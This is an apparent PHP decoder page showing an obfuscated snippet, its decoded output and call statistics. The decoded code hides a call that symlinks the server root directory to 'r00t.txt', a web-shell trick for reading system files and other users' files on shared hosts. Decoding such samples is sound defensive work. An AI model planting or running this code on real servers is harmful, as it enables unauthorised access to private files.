Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
function sa(){ $file = ("\x2F"); $functi0n = ("\x73\x79\x6D\x6C\x69\x6E\x6B"); $out..
Decoded Output download
<?
function sa(){
$file = ("/");
$functi0n = ("symlink");
$output = ("r00t.txt");
echo $functi0n($file,$output);
}
sa(); ?>
Did this file decode correctly?
Original Code
function sa(){
$file = ("\x2F");
$functi0n = ("\x73\x79\x6D\x6C\x69\x6E\x6B");
$output = ("\x72\x30\x30\x74\x2E\x74\x78\x74");
echo $functi0n($file,$output);
}
sa();
Function Calls
sa | 1 |
symlink | 1 |
Stats
MD5 | 9089ddb3b9869d64cfef91a66ca069ae |
Eval Count | 0 |
Decode Time | 67 ms |